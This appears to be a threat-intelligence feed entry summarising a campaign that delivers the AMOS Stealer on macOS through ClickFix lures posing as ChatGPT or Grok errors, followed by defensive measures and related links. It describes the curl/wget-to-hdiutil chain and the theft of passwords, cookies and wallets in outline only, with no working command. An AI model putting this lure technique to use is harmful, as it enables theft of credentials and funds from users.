← Back to Intel Feed Snapshot (2026-07-03)

Threat actors are deploying the AMOS Stealer on macOS by adapting the "ClickFix" social engineering technique. The attack leverages browser-based lures masquerading as AI tool errors (e.g., ChatGPT, Grok), prompting users to manually copy and execute a malicious command in the macOS Terminal. This sequence bypasses browser security and Gatekeeper by utilizing curl or wget to download a DMG file, which is then silently mounted via hdiutil. The primary objective is the exfiltration of browser passwords, session cookies, and cryptocurrency wallets.

  • Campaign Overview: The ClickFix Pivot

    • Transition of ClickFix techniques from Windows to macOS environments to expand target reach.
    • High-efficiency vectors leveraging psychological trust in AI platforms like ChatGPT and Grok.
    • Strategic shift toward user-initiated execution to neutralize automated security blocks and browser warnings.
  • Attack Vector: Manual Command Execution

    • Lures simulate technical glitches, instructing users to paste specific strings into zsh/bash.
    • Execution chain: Browser Lure $\rightarrow$ Terminal Command $\rightarrow$ Remote Payload Download $\rightarrow$ DMG Mount.
    • Use of the hdiutil utility to silently mount the malicious image, bypassing traditional installer prompts.
  • Malware Profile: AMOS Stealer

    • Specifically engineered macOS infostealer designed for stealthy data harvesting.
    • Targeted exfiltration of browser-stored passwords, session cookies, and system metadata.
    • Active targeting of local cryptocurrency wallet files and sensitive authentication tokens.
  • Defensive Actions & Mitigation

    • Opera Browser implemented "Paste Protect" to disrupt the clipboard-to-terminal delivery pipeline.
    • Defensive monitoring should focus on anomalous curl or wget requests that trigger hdiutil mounts.
    • Requirement for enhanced user education regarding the extreme risk of executing untrusted Terminal commands.
  • Conclusion: Evolving Social Engineering

    • Highlights a trend of bypassing OS-level protections (Gatekeeper) through direct human manipulation.
    • Demonstrates the vulnerability of users who are comfortable with command-line interfaces.
    • Necessitates a shift toward behavioral monitoring of system utilities over static signature detection.

Related posts

  1. techjacksolutions.com — SmartApeSG ClickFix Chain Delivers NetSupport RAT via Unidentified Dropper with Encoded C2 Traffic
  2. bleepingcomputer.com — Opera rolls out Paste Protect feature to fight ClickFix attacks
  3. News4Hackers — Opera Launches Paste Protect to Combat ClickFix Attacks
  4. Cybersecurity News — Opera Blocks Clipboard Attacks, Including ClickFix, With New Paste Protect Feature
  5. itpro.com — Opera browser thinks it has the solution to stopping ClickFix malware attacks
  6. Dark Reading — And the Winner in Dominant Malware Delivery? ClickFix
  7. Gurucul
  8. Securityboulevard
  9. Reddit
  10. Daily
  11. Malwarebytes
  12. Trendmicro
  13. Huntress
  14. Broadcom
  15. Huntress
  16. Cyberproof

LINK COPIED TO CLIPBOARD